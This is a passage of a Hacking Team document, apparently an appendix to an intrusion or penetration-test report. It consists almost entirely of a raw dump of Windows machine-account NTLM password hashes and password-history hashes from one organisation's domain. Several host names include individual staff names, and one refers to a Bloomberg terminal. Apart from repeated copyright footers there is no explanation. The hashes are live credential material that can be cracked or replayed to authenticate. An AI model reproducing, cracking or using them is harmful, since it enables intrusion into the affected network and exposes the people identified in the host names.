MILSIAWS05$_history_1:1699:NO PASSWORD*********************:DC03896B633E8659CD8D21DD997E5DD6:::
MILSIAWS05$_history_2:1699:NO PASSWORD*********************:8F69EF1905B210F53FF1462501841F8C:::
MILSIAWS05$_history_3:1699:NO PASSWORD*********************:EB4B29EDE2766B6F469C8E82D34B3DEE:::
MILSIAWS05$_history_4:1699:NO PASSWORD*********************:984CE56CCCF1AF18144184B94AEC519C:::
MILSIAWS05$_history_5:1699:NO PASSWORD*********************:A716A62ADACD9F1BB6E9654F4B98A935:::
MILSIAWS05$_history_6:1699:NO PASSWORD*********************:2CCF6BF2860CD5337ABB56C5AA22A543:::
MILSIAWS05$_history_7:1699:NO PASSWORD*********************:6CEC2BBC6FC2BA5A18E2A523DE913930:::
MILSIAWS05$_history_8:1699:NO PASSWORD*********************:05758CF42383DF8651C95E06AA21BD99:::
MILSIAWS05$_history_9:1699:NO PASSWORD*********************:246AA93B5415AC51F766F7669460543A:::
MILSIAWS05$_history_10:1699:NO PASSWORD*********************:499D81A40D879A8EBC8C2946EA25DA7A:::
GBORDIN$:1700:NO PASSWORD*********************:514971997A68DA59B4462D723202AC86:::
GBORDIN$_history_0:1700:NO PASSWORD*********************:F68AD74B2CC34AF852686F619528E542:::
GBORDIN$_history_1:1700:NO PASSWORD*********************:227ACD41173455E518F66482A9DDE41F:::
GBORDIN$_history_2:1700:NO PASSWORD*********************:1CBBF502225E86226443DF94040C2A99:::
GBORDIN$_history_3:1700:NO PASSWORD*********************:1F9F529BEDDBEF68BBC7A95917DD847C:::
GBORDIN$_history_4:1700:NO PASSWORD*********************:73B32B25D72F6C8F2B6CABC619B47455:::
GBORDIN$_history_5:1700:NO PASSWORD*********************:B5BD5119AA75D48ADE7E1613B48F45CB:::
GBORDIN$_history_6:1700:NO PASSWORD*********************:15744B0CBAD01FAD6115CBC6A48D0FF6:::
GBORDIN$_history_7:1700:NO PASSWORD*********************:77DB87A3B48FAFA44070789C2914761B:::
GBORDIN$_history_8:1700:NO PASSWORD*********************:5EC7DE1B60A39253D3A006E1E1986DA9:::
GBORDIN$_history_9:1700:NO PASSWORD*********************:56B6510EC1D9410B128D10FC05022589:::
GBORDIN$_history_10:1700:NO PASSWORD*********************:646DED4B89BBE54B8177AB377AD3591B:::
R100SPARE$:1701:NO PASSWORD*********************:FA1021E85284B2EB176F94940865B4D4:::
R100SPARE$_history_0:1701:NO PASSWORD*********************:784F6FA481B4272E6800EF3B82F3482E:::
RLOMBARDI-LAP$:1709:NO PASSWORD*********************:D2A98449B5EF0269657F81BFAFC6BD37:::
RLOMBARDI-LAP$_history_0:1709:NO PASSWORD*********************:9094F3A12C184C49AA5BF5F37D97DBA5:::
RLOMBARDI-LAP$_history_1:1709:NO PASSWORD*********************:D241118FDF5ABA06D85CB31DD4840F1E:::
RLOMBARDI-LAP$_history_2:1709:NO PASSWORD*********************:3D084EB5AF804DDB72848E71E2760517:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 439 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
RLOMBARDI-LAP$_history_3:1709:NO PASSWORD*********************:B54D88C6A7F501B15FCCF158EF3A2FF4:::
RLOMBARDI-LAP$_history_4:1709:NO PASSWORD*********************:04415BF8BD92AF86C3999F8361C60748:::
RLOMBARDI-LAP$_history_5:1709:NO PASSWORD*********************:8BF1BAF9AE9990F48640FAEBA8949ED7:::
RLOMBARDI-LAP$_history_6:1709:NO PASSWORD*********************:1F3733E8817D2329838465DC805A8212:::
LMENEGHESSO2$:1716:NO PASSWORD*********************:E17ADE4E236D21E6925230A60576FEB1:::
LMENEGHESSO2$_history_0:1716:NO PASSWORD*********************:37B15F3823E5C0AF11ADFEE1532EB5F9:::
LMENEGHESSO2$_history_1:1716:NO PASSWORD*********************:B05C9643E2FDE09D85D6D8CB048C61A4:::
LMENEGHESSO$:1718:NO PASSWORD*********************:3B913EB4F87E3B71033B66E5509B89AA:::
LMENEGHESSO$_history_0:1718:NO PASSWORD*********************:552F77D3DA153F2680648B96C3305EB5:::
LMENEGHESSO$_history_1:1718:NO PASSWORD*********************:5D72CB8B890CCA658E57E51C4B1F8D35:::
LMENEGHESSO$_history_2:1718:NO PASSWORD*********************:438F31906456A1DB8317BCB4F89F5101:::
LMENEGHESSO$_history_3:1718:NO PASSWORD*********************:F3AA7E7146A23154A20565D4D83B25E3:::
LMENEGHESSO$_history_4:1718:NO PASSWORD*********************:4400703CE6569ED6401EC7217E0EF0F6:::
DMASELLA-LAP$:1719:NO PASSWORD*********************:8D17CC4235A30B6D8FDDE6F3A0234599:::
DMASELLA-LAP$_history_0:1719:NO PASSWORD*********************:9FD02EF9E4E43D80567281063F0A9F63:::
DMASELLA-LAP$_history_1:1719:NO PASSWORD*********************:B8B2C3E159BA44BE2C797115E3B89935:::
SMARCHETTI-LAP1$:1720:NO PASSWORD*********************:52B2C5A4D0CF8E38AAC7ACE779CD0B03:::
SMARCHETTI-LAP1$_history_0:1720:NO PASSWORD*********************:5BE89DCD693474A0FC16EA83873634AA:::
SMARCHETTI-LAP1$_history_1:1720:NO PASSWORD*********************:8406D0DC1BE9D2DC7E83AB9D218F69FC:::
SMARCHETTI-LAP1$_history_2:1720:NO PASSWORD*********************:48B689097744CA19926A45C2DC6C1739:::
SMARCHETTI-LAP1$_history_3:1720:NO PASSWORD*********************:7422973309A4540A19BA4F5A4C6A7C0D:::
MLUPO-LAP$:1722:NO PASSWORD*********************:A2578A26B375190C493FADF4A2D981A9:::
MLUPO-LAP$_history_0:1722:NO PASSWORD*********************:79AB4DDF3BF0AC8C7E5DA0984C4C1A0C:::
MLUPO-LAP$_history_1:1722:NO PASSWORD*********************:B26B1C63F1F07FB82EAA6887326277CF:::
MLUPO-LAP$_history_2:1722:NO PASSWORD*********************:F71105DA45487FE387808605733242D0:::
MLUPO-LAP$_history_3:1722:NO PASSWORD*********************:B2538975FD7A90C87B2CF92A0DB656B8:::
MPRIMAVERA$:1723:NO PASSWORD*********************:D68E4A3BB0A037270D7E3E0CEF96D871:::
MPRIMAVERA$_history_0:1723:NO PASSWORD*********************:044E09925AA39AB57A8B0C7D7BC5C54E:::
GBOCCARDI$:1724:NO PASSWORD*********************:93A4178621DB1D587835EF3EA4A4639F:::
GBOCCARDI$_history_0:1724:NO PASSWORD*********************:5D54DB139CD099DE267DF925412022C3:::
SPARE$:1726:NO PASSWORD*********************:1B18CAC85513FCAD241F9B8CB00E67D5:::
SPARE$_history_0:1726:NO PASSWORD*********************:5A055DE58B119B5824AFD900F0F546F4:::
GMANZULLO$:1727:NO PASSWORD*********************:3C36D1298255B472522D613D748D2808:::
PLUTO$:1728:NO PASSWORD*********************:AF401AC08CD15C9BD587CB4311ED8CC0:::
PRICEFEED-ROM$:3105:NO PASSWORD*********************:49C5E78E472634DDD29B69404BCEB77C:::
PRICEFEED-ROM$_history_0:3105:NO PASSWORD*********************:C287317C3799BB57D47E4056F6D3445E:::
PRICEFEED-ROM$_history_1:3105:NO PASSWORD*********************:C17A662467F5F4FA5458532B4B46A29C:::
PRICEFEED-ROM$_history_2:3105:NO PASSWORD*********************:4A857FF20F10870C640D5A304EE7BB47:::
PRICEFEED-ROM$_history_3:3105:NO PASSWORD*********************:53F78BF29D7EC86FCA29E629DB08E12D:::
PRICEFEED-ROM$_history_4:3105:NO PASSWORD*********************:844AF2B16238B9E44C7EA5746D449582:::
PRICEFEED-ROM$_history_5:3105:NO PASSWORD*********************:FA928523DAFD04750AAD78A8366F33D9:::
PRICEFEED-ROM$_history_6:3105:NO PASSWORD*********************:0A27E581556C6321073E5CE673769CBF:::
PRICEFEED-ROM$_history_7:3105:NO PASSWORD*********************:E23A691F93F070AD0590394D3BEA7C6F:::
PRICEFEED-ROM$_history_8:3105:NO PASSWORD*********************:444126261EDBDEF1EE486D6162F7E0C9:::
PRICEFEED-ROM$_history_9:3105:NO PASSWORD*********************:B926DA024459A9677878FFE6EFDB6E2C:::
PRICEFEED-ROM$_history_10:3105:NO PASSWORD*********************:E0C63453A75C27E3CADCB673068F70CE:::
RRIZZO$:3107:NO PASSWORD*********************:5A31AF468A7C80F2AB114A711F04C738:::
RRIZZO$_history_0:3107:NO PASSWORD*********************:C4733A180616FFEA5E8BEB6F6BCD0858:::
RRIZZO$_history_1:3107:NO PASSWORD*********************:6F96A8852AE3E11202B0FC78EBA9AA3F:::
RRIZZO$_history_2:3107:NO PASSWORD*********************:776C08EC057ED7A2843DC2FD86AA4725:::
RRIZZO$_history_3:3107:NO PASSWORD*********************:9880BEFF138F1054F827A93D29E8B956:::
RRIZZO$_history_4:3107:NO PASSWORD*********************:E0D0BED2C3118B9D719CD0A7380BCF13:::
RRIZZO$_history_5:3107:NO PASSWORD*********************:DC8EEBAA4C6255C213E53621275CA0DF:::
RRIZZO$_history_6:3107:NO PASSWORD*********************:F0DEBE153848B59056ECA10C7F07D473:::
RRIZZO$_history_7:3107:NO PASSWORD*********************:94FF39896DBEF9B842CE42F37F7664F2:::
RRIZZO$_history_8:3107:NO PASSWORD*********************:765D29DEDD417D918F23E404C0CBFCF3:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 440 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
RRIZZO$_history_9:3107:NO PASSWORD*********************:EC84C7CBD29B12035B3660FE9272628A:::
RRIZZO$_history_10:3107:NO PASSWORD*********************:3197DA60A6B5E721BCBBC1D7F56E9806:::
MPECCHI$:3109:NO PASSWORD*********************:80F7E2337920106FBE1586B488CD37B6:::
MPECCHI$_history_0:3109:NO PASSWORD*********************:B8AE0D180E507B2675AB378F96CE1113:::
MPECCHI$_history_1:3109:NO PASSWORD*********************:1AF4A97867F665C236517534A4918E90:::
MPECCHI$_history_2:3109:NO PASSWORD*********************:ECF20592C46D430E7EB89FA647147F2C:::
MPECCHI$_history_3:3109:NO PASSWORD*********************:9BB6D4DAC9C5A6948EFB808CEC1985B1:::
MPECCHI$_history_4:3109:NO PASSWORD*********************:DACB86F01D64643F97F9A01FEC5D0845:::
MPECCHI$_history_5:3109:NO PASSWORD*********************:F83D8191CEDEA7D9EB1B91F2B26FC8EF:::
MPECCHI$_history_6:3109:NO PASSWORD*********************:EC3E58265431466EED653CC328797ED5:::
MPECCHI$_history_7:3109:NO PASSWORD*********************:CD0131FE4711D4C7161E653EAD5316A8:::
MPECCHI$_history_8:3109:NO PASSWORD*********************:6D838E71F4C9CEB273B417F39A9E8215:::
MPECCHI$_history_9:3109:NO PASSWORD*********************:073B98F235F064D922AF8BF0AAF3937B:::
MPECCHI$_history_10:3109:NO PASSWORD*********************:DAB5BC394AC07BFF4F62D4B7A749B85C:::
EMALASISI$:3110:NO PASSWORD*********************:3B945A39B29CF84BACC1A46117E672ED:::
EMALASISI$_history_0:3110:NO PASSWORD*********************:4EA5127F072C6BD38E92612830730A87:::
EMALASISI$_history_1:3110:NO PASSWORD*********************:42C5E66F06BFDF12824F32AFA6431DB0:::
EMALASISI$_history_2:3110:NO PASSWORD*********************:4D313248B4A985AE23375B532A57D657:::
EMALASISI$_history_3:3110:NO PASSWORD*********************:9FD6DF02C0DB3B9A22F3F8443ED3F1A9:::
EMALASISI$_history_4:3110:NO PASSWORD*********************:050F2B3C7CCB7BFAE12A9DC63F9142BA:::
EMALASISI$_history_5:3110:NO PASSWORD*********************:D632176C86F07A5410C7358522124B4A:::
EMALASISI$_history_6:3110:NO PASSWORD*********************:36C1A5EAAC207AB4AE5F336929FFCF5D:::
EMALASISI$_history_7:3110:NO PASSWORD*********************:1E8A26B0A9824336D3377A5757402536:::
EMALASISI$_history_8:3110:NO PASSWORD*********************:4273B43AF581EB1209234D4CDCC32C4F:::
EMALASISI$_history_9:3110:NO PASSWORD*********************:BFF567F405E2023C9278D63043A329A8:::
EMALASISI$_history_10:3110:NO PASSWORD*********************:4F91E6AAEF66DE92B09A6C35DF05DB31:::
CTRETTO-LPT$:3111:NO PASSWORD*********************:09388CD1AE5C710454422560AB576A4F:::
CTRETTO-LPT$_history_0:3111:NO PASSWORD*********************:A091757D97997405664D27A102C97C51:::
CTRETTO-LPT$_history_1:3111:NO PASSWORD*********************:75B9F8BB923714323DAFFAE17CAB3A75:::
CTRETTO-LPT$_history_2:3111:NO PASSWORD*********************:A3181638C7278561A79F4AAA75E3D9BF:::
CTRETTO-LPT$_history_3:3111:NO PASSWORD*********************:FD37BF713F8028BCB39BEA7250F96F4A:::
CTRETTO-LPT$_history_4:3111:NO PASSWORD*********************:8E4147C391A388B6FD6C5B2E27646EDD:::
CTRETTO-LPT$_history_5:3111:NO PASSWORD*********************:A137CC87525E3C01E4B6D348A02B7757:::
CTRETTO-LPT$_history_6:3111:NO PASSWORD*********************:12B0E197F8640B71E48FE178AD433483:::
CTRETTO-LPT$_history_7:3111:NO PASSWORD*********************:5ED28C85D677DA90423C203A62D02FF5:::
CTRETTO-LPT$_history_8:3111:NO PASSWORD*********************:6D898249578258DA2E02FDADD3ECFBF9:::
CTRETTO-LPT$_history_9:3111:NO PASSWORD*********************:5F1549E63028AACC9980DC75F6BCF550:::
CTRETTO-LPT$_history_10:3111:NO PASSWORD*********************:1797F261A3278C4E454656A31AF73CA0:::
CPATAMIA$:3112:NO PASSWORD*********************:45ADE0275C0655AB3874226822A9674D:::
CPATAMIA$_history_0:3112:NO PASSWORD*********************:8D4A700F1E2FF14FB35BCE60D4805319:::
CPATAMIA$_history_1:3112:NO PASSWORD*********************:EDD0E8BDD8E981C3D6EE564929AE352B:::
CPATAMIA$_history_2:3112:NO PASSWORD*********************:2058B95F9693985B5E234CBE0C1A88EF:::
CPATAMIA$_history_3:3112:NO PASSWORD*********************:5DFF4F58C837AFB31E66F624D5AA68C8:::
CPATAMIA$_history_4:3112:NO PASSWORD*********************:B1442AE10C3D0B824F3D50C8CA048221:::
CPATAMIA$_history_5:3112:NO PASSWORD*********************:D962ECFBCFF84E06B52CF6A3165ABDEE:::
CPATAMIA$_history_6:3112:NO PASSWORD*********************:C795088FADE5108B213A24029309552B:::
CPATAMIA$_history_7:3112:NO PASSWORD*********************:CF34940E826926984748F215DD3E3866:::
CPATAMIA$_history_8:3112:NO PASSWORD*********************:8EB1345D3D0329F781D6ACBB599BD561:::
CPATAMIA$_history_9:3112:NO PASSWORD*********************:5D4CFF3EC7CF199C612F280FCEBB9049:::
CPATAMIA$_history_10:3112:NO PASSWORD*********************:C11133B8A6C984972B05C7882CB37DA2:::
VVECCHIARELLI$:3115:NO PASSWORD*********************:EDBE1EC08F2CABBA1D3AFAF8D77665BA:::
VVECCHIARELLI$_history_0:3115:NO PASSWORD*********************:C0ECA06902621691FDF533E2F5C12526:::
FBRUNI$:3117:NO PASSWORD*********************:18393F812919E4355BC787D30C116436:::
FBRUNI$_history_0:3117:NO PASSWORD*********************:12C27719A585102C67B2597EE0434504:::
FBRUNI$_history_1:3117:NO PASSWORD*********************:27EC69CB66AF86898955C5B7E6A867AC:::
FBRUNI$_history_2:3117:NO PASSWORD*********************:FFB8932243F9FA7CFA44AB00343F8F1F:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 441 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
FBRUNI$_history_3:3117:NO PASSWORD*********************:8F6FE996D532E43D27081DF52EE7305B:::
FBRUNI$_history_4:3117:NO PASSWORD*********************:5B2644683DF753C65356183DD93215AF:::
FBRUNI$_history_5:3117:NO PASSWORD*********************:9C80869EAC1B09F204B43C9C3738C8EA:::
ERAPONI$:3118:NO PASSWORD*********************:2533B895BA4CEC3AFB903E01803619C9:::
ERAPONI$_history_0:3118:NO PASSWORD*********************:2573CAD92D0413EE1236AA4403906A7F:::
ERAPONI$_history_1:3118:NO PASSWORD*********************:72A3B235F4357B8EEF6DAA7540B8BEA6:::
ERAPONI$_history_2:3118:NO PASSWORD*********************:1CE762E2D892431D04BE64CF9867D0B8:::
ERAPONI$_history_3:3118:NO PASSWORD*********************:09B0CA006AE8FCF10ECF87746B2A9C36:::
ERAPONI$_history_4:3118:NO PASSWORD*********************:C416E09F341EB314003119E4805B14E8:::
ERAPONI$_history_5:3118:NO PASSWORD*********************:BF928AF95E4D04891F3A4C7FB5DB7D63:::
ERAPONI$_history_6:3118:NO PASSWORD*********************:47226E538C982926B013188C7E0CA153:::
ERAPONI$_history_7:3118:NO PASSWORD*********************:1EF409F2D991F3CF8B790D20A39F5AD9:::
ERAPONI$_history_8:3118:NO PASSWORD*********************:3B9A07751B5E7A507C2DD41158D5D9FE:::
ERAPONI$_history_9:3118:NO PASSWORD*********************:8431E77CAEF212C3A5F92A663436F8E7:::
ERAPONI$_history_10:3118:NO PASSWORD*********************:4AE44B03799041C849E98B1BE8DC9DC6:::
SRIUNIONI-ROMA$:3119:NO PASSWORD*********************:FE4267B1605D3EC2B3AB9D525F0A895F:::
HP82801667620$:3120:NO PASSWORD*********************:B87AEA21B11629A2985DD60DECAF548A:::
HP82801667620$_history_0:3120:NO PASSWORD*********************:38C34D1B3E3F2CDD5C5E68778B84331A:::
HP82801667620$_history_1:3120:NO PASSWORD*********************:A3B19B9FE2F7392EE8669B60C9576384:::
HP82801667620$_history_2:3120:NO PASSWORD*********************:FD40BC2F74B7A9F78180D1F0B0BB4FCF:::
HP82801667620$_history_3:3120:NO PASSWORD*********************:6D860F462F421F00E957E29279812B36:::
HP82801667620$_history_4:3120:NO PASSWORD*********************:0C63A33A08971652DDFA91FA0F1FAD1B:::
HP82801667620$_history_5:3120:NO PASSWORD*********************:9AD2065A64530B2FD162BE9F9AC1C2B0:::
HP82801667620$_history_6:3120:NO PASSWORD*********************:C4BB9636777099CFBDB7F294C5776043:::
HP82801667620$_history_7:3120:NO PASSWORD*********************:D0BC52B14436DABEFFACA9EFE113FE8A:::
HP82801667620$_history_8:3120:NO PASSWORD*********************:A0B47D21CC26FC879991A7B1EAEF8685:::
DRIGA$:3121:NO PASSWORD*********************:CDB326EC5ECDFFE075522AA2BA9F89C7:::
DRIGA$_history_0:3121:NO PASSWORD*********************:89FB727D239D53C2F304DA016697364B:::
DRIGA$_history_1:3121:NO PASSWORD*********************:B83643E5F095DED540842F89820489B7:::
DRIGA$_history_2:3121:NO PASSWORD*********************:557C9FC9278D216E2BCA1B2A5AEEAECB:::
DRIGA$_history_3:3121:NO PASSWORD*********************:B257C3158D4AAC860138A2505A1F1C97:::
DRIGA$_history_4:3121:NO PASSWORD*********************:BD30C3BDA6605D40BF2E35332FA7BAD6:::
DRIGA$_history_5:3121:NO PASSWORD*********************:B95FC6376A779BECD58C3DB66CB241BF:::
DRIGA$_history_6:3121:NO PASSWORD*********************:B1A31DF927824EE0802203ACB740FAD6:::
DRIGA$_history_7:3121:NO PASSWORD*********************:93AAE9361A4AC55B85713269F92B9B8E:::
DRIGA$_history_8:3121:NO PASSWORD*********************:ADD8B38F3E532D52D41933CBB779712D:::
DRIGA$_history_9:3121:NO PASSWORD*********************:C94EE74CB016AC71EB4296E77AA60AC6:::
DRIGA$_history_10:3121:NO PASSWORD*********************:B00E80DAFA27AD3772AECA9D0772E28E:::
WEBADMINP220$:3122:NO PASSWORD*********************:6181AF63E23701ECD9794D6E8D2C55DA:::
WEBADMINP220$_history_0:3122:NO PASSWORD*********************:C9E7ACCF9FC083D2ABB7877368569A0A:::
WEBADMINP220$_history_1:3122:NO PASSWORD*********************:369F8CE21F017C00BB4FB283AACB69E6:::
WEBADMINP220$_history_2:3122:NO PASSWORD*********************:2E9ECBFEA00BC858960201D8BD9C078D:::
WEBADMINP220$_history_3:3122:NO PASSWORD*********************:394ADE3450CA458BC4F7202D1D6F9997:::
WEBADMINP220$_history_4:3122:NO PASSWORD*********************:6018CA94C62FE506F1880EE828CD25C1:::
WEBADMINP220$_history_5:3122:NO PASSWORD*********************:431123D1316C3EF921399515C40A0CBB:::
WEBADMINP220$_history_6:3122:NO PASSWORD*********************:A72A0A5E293FD5A38D7ECB9A92CAA086:::
WEBADMINP220$_history_7:3122:NO PASSWORD*********************:D183F702404015AAE2B674920AEA89B1:::
WEBADMINP220$_history_8:3122:NO PASSWORD*********************:C490664C894BB573AEB46B118ED40A82:::
WEBADMINP220$_history_9:3122:NO PASSWORD*********************:42EFAAD138C96DAB41632C832D90A08E:::
ROMATEST$:3123:NO PASSWORD*********************:D10920C005EF1D6158DECE2D680F5195:::
ROMATEST$_history_0:3123:NO PASSWORD*********************:9996AF781865EA32592EBEBA77A101B2:::
ROMATEST$_history_1:3123:NO PASSWORD*********************:C33A5A4CDCD55BE9F27C8E861BF166B6:::
ROMATEST$_history_2:3123:NO PASSWORD*********************:8E43A0295A43F5B8EF60CD53C0BADC8A:::
ROMATEST$_history_3:3123:NO PASSWORD*********************:9DD56F8267F9264ED9D617B7C4AF069D:::
ROMATEST$_history_4:3123:NO PASSWORD*********************:24A0455427A085B6CF4EC67A26490572:::
ROMATEST$_history_5:3123:NO PASSWORD*********************:EDA78D832960D51353CD301DEC2F85F9:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 442 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ROMATEST$_history_6:3123:NO PASSWORD*********************:9C491CCCF4E67ECAD47C3ED12362A138:::
ROMATEST$_history_7:3123:NO PASSWORD*********************:3D1011CFE91CA6791C4DB0F441DDEBB1:::
ROMATEST$_history_8:3123:NO PASSWORD*********************:35DDA3B206F6D6CE414AF7B19EC765B5:::
PC_TONY_S$:3124:NO PASSWORD*********************:B65F3AFB3B387BC829BC337FE860831B:::
PC_TONY_S$_history_0:3124:NO PASSWORD*********************:C850349743FAA59C315600864C5FA8C1:::
PC_TONY_S$_history_1:3124:NO PASSWORD*********************:CB0AE71E2832FF3CAB520A65E20D22CC:::
PC_TONY_S$_history_2:3124:NO PASSWORD*********************:2BC5F9D7C26235F61390E8D087BE82ED:::
PC_TONY_S$_history_3:3124:NO PASSWORD*********************:1E5E327C227C28BC7950512C10C37016:::
PC_TONY_S$_history_4:3124:NO PASSWORD*********************:B5DC5D3D239AE04A3F7705923C19F361:::
PC_TONY_S$_history_5:3124:NO PASSWORD*********************:4F19B844255475A0159E83E699A4A394:::
PC_TONY_S$_history_6:3124:NO PASSWORD*********************:B80A5C7DFEE4196F39DC884CD05052EA:::
PC_TONY_S$_history_7:3124:NO PASSWORD*********************:91DC2AFC400E73B89308E4F4DE08DBB1:::
PC_TONY_S$_history_8:3124:NO PASSWORD*********************:7D56951DABEC5A06EF7F571D75B2C30A:::
PC_TONY_S$_history_9:3124:NO PASSWORD*********************:2B17F73571920539E48D0F189CA3EDD3:::
PC_TONY_S$_history_10:3124:NO PASSWORD*********************:FB3DAC638236EFBA0C9E7DF94226AFB5:::
BLOOMBERG-ROM$:3126:NO PASSWORD*********************:A4D866A80492270DBA222D6CEAEB8E29:::
BLOOMBERG-ROM$_history_0:3126:NO PASSWORD*********************:EC26570C297661BE9E4810BFA22FD0A6:::
BLOOMBERG-ROM$_history_1:3126:NO PASSWORD*********************:66F8BA211C2AA42CF3988DF2810E55C7:::
BLOOMBERG-ROM$_history_2:3126:NO PASSWORD*********************:55709CA1C0C3F851871F73CED51B0B81:::
BLOOMBERG-ROM$_history_3:3126:NO PASSWORD*********************:99D98EDAD30451421732B5D326B17742:::
BLOOMBERG-ROM$_history_4:3126:NO PASSWORD*********************:DD535EA6044F96C8D83BD4B169E3AB1B:::
BLOOMBERG-ROM$_history_5:3126:NO PASSWORD*********************:FE263E701B9143DC2A5F0603ADC8C293:::
BLOOMBERG-ROM$_history_6:3126:NO PASSWORD*********************:4AD75F3AADA4C57A8A425DBF427D0C17:::
BLOOMBERG-ROM$_history_7:3126:NO PASSWORD*********************:10F69D23396E728B436C0A2813849D0A:::
BLOOMBERG-ROM$_history_8:3126:NO PASSWORD*********************:9479DAA4350570C6CE7C893516F2DA0B:::
BLOOMBERG-ROM$_history_9:3126:NO PASSWORD*********************:910818335B14799DDAC8BEE0465E6D85:::
BLOOMBERG-ROM$_history_10:3126:NO PASSWORD*********************:806D3C661E8E4C19C2E825FEED9420D9:::
CPIETROLUONGOP$:3127:NO PASSWORD*********************:C779B1AE9AB96633064C5B427D97A63A:::
CPIETROLUONGOP$_history_0:3127:NO PASSWORD*********************:DD37860389323458E75AAEE1829BC516:::
CPIETROLUONGOP$_history_1:3127:NO PASSWORD*********************:7CBEAD2E2C2704A673ACAD10A92A229C:::
CPIETROLUONGOP$_history_2:3127:NO PASSWORD*********************:8FF0C537B350E233D1151BFF46A9B147:::
CPIETROLUONGOP$_history_3:3127:NO PASSWORD*********************:9472E7DE5E82F5B67DE24148DCD9CE82:::
ROMLAPTMP$:3128:NO PASSWORD*********************:1E13906EFE0372E076FB999FC8935B5E:::
ROMLAPTMP$_history_0:3128:NO PASSWORD*********************:9BC28A0C6C0765C5DCB4B9ABCD5C5835:::
ROMLAPTMP$_history_1:3128:NO PASSWORD*********************:3A10032A8931C9FF1A168FEE53D2CAF4:::
ROMLAPTMP$_history_2:3128:NO PASSWORD*********************:E22C4E70122680D86B2852E4C0C8F660:::
ROMLAPTMP$_history_3:3128:NO PASSWORD*********************:4BB3B00227A2D4B5550BABB54ACBFB03:::
ROMAEVO1-745F10$:3129:NO PASSWORD*********************:71181D5F494555CB80918B4C5170CA16:::
ROMAEVO1-745F10$_history_0:3129:NO PASSWORD*********************:2DD8CF12AB81ABDA09A307C050F27568:::
ROMAEVO1-745F10$_history_1:3129:NO PASSWORD*********************:8DAE1B4ACBFDAFFB97C0AEAC3B25F8BD:::
ROMAEVO1-745F10$_history_2:3129:NO PASSWORD*********************:0C4A8359FCD0D48F68EFD8EB3E766ECE:::
ROMAEVO1-745F10$_history_3:3129:NO PASSWORD*********************:89AB4EF75E532D9E19E715A516064074:::
ROMAEVO1-745F10$_history_4:3129:NO PASSWORD*********************:B57D7F42E18E0B7F82F7D4D841C8B449:::
ROMAEVO1-745F10$_history_5:3129:NO PASSWORD*********************:36BA967B3DAA9AFCC56BE426AF4C3FBA:::
ROMAEVO1-745F10$_history_6:3129:NO PASSWORD*********************:3207838D63498D37280EE7C769D8F61A:::
ROMAEVO1-745F10$_history_7:3129:NO PASSWORD*********************:36F298DDDCF8B979DF40C6713A870695:::
ROMAEVO1-745F10$_history_8:3129:NO PASSWORD*********************:4B31FE094093D9337E6E4548531BDE6B:::
ROMAEVO1-745F10$_history_9:3129:NO PASSWORD*********************:48CB8268435BCBB5FDAECFF4FA26379F:::
ROMEGUEST$:3132:NO PASSWORD*********************:36649626E34ABEE87C334F6E7615CCFE:::
ROMEGUEST$_history_0:3132:NO PASSWORD*********************:50809291DBF48A00302CFEC2F512D345:::
ROMEGUEST$_history_1:3132:NO PASSWORD*********************:BC6E7495E107A7F7986D0A5297A5F103:::
ROMEGUEST$_history_2:3132:NO PASSWORD*********************:F2F2FC276FDFF4847215BBC1E554B760:::
ROMEGUEST$_history_3:3132:NO PASSWORD*********************:AA09A80B48D318238198CE407A23F04B:::
ROMEGUEST$_history_4:3132:NO PASSWORD*********************:B5A27A51B9C8ADDAD122A7630855BDA9:::
ROMEGUEST$_history_5:3132:NO PASSWORD*********************:40CCE05A27D5CB0F54AF9589D079403B:::
ROMEGUEST$_history_6:3132:NO PASSWORD*********************:A218A1F341CBC9442BC32DC021B76FCE:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 443 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MTS-9FAEFB81642$:3133:NO PASSWORD*********************:8D1B852D25A7C96D291C21E95CB66A91:::
MTS-9FAEFB81642$_history_0:3133:NO PASSWORD*********************:1AEE1503D07038B34C352B74922C0881:::
MTS-9FAEFB81642$_history_1:3133:NO PASSWORD*********************:653E7F60D1C569B48A15D8D9CF4CB6E8:::
CPIETROLUONGO$:4608:NO PASSWORD*********************:CAEF390C478BB66CB9AB491E5E388C2E:::
CPIETROLUONGO$_history_0:4608:NO PASSWORD*********************:9CB5E8246EDE1F79304BDDCF0CE1DABA:::
CPIETROLUONGO$_history_1:4608:NO PASSWORD*********************:4D69AEEFEDFC38C5EB6AC8B84A4BF335:::
CPIETROLUONGO$_history_2:4608:NO PASSWORD*********************:299E8B17559A527CB276C6E7E5953D55:::
CPIETROLUONGO$_history_3:4608:NO PASSWORD*********************:8CCD89CD2335CC6B6C3FF9DB2DFEB29D:::
CPIETROLUONGO$_history_4:4608:NO PASSWORD*********************:1F8E1562860A3E1687EE2200AC09584E:::
CPIETROLUONGO$_history_5:4608:NO PASSWORD*********************:D017E374B45D922E6279A3B6547E88E8:::
CPIETROLUONGO$_history_6:4608:NO PASSWORD*********************:4FC642F7C5797F2692E9A5A160ABC36E:::
CPIETROLUONGO$_history_7:4608:NO PASSWORD*********************:2B041E6205E253F627ECECB6FD035C49:::
CPIETROLUONGO$_history_8:4608:NO PASSWORD*********************:0AA25EE4C3D83B4ACEE71582EE849553:::
CPIETROLUONGO$_history_9:4608:NO PASSWORD*********************:FAFE3D87E02F84268935318100309267:::
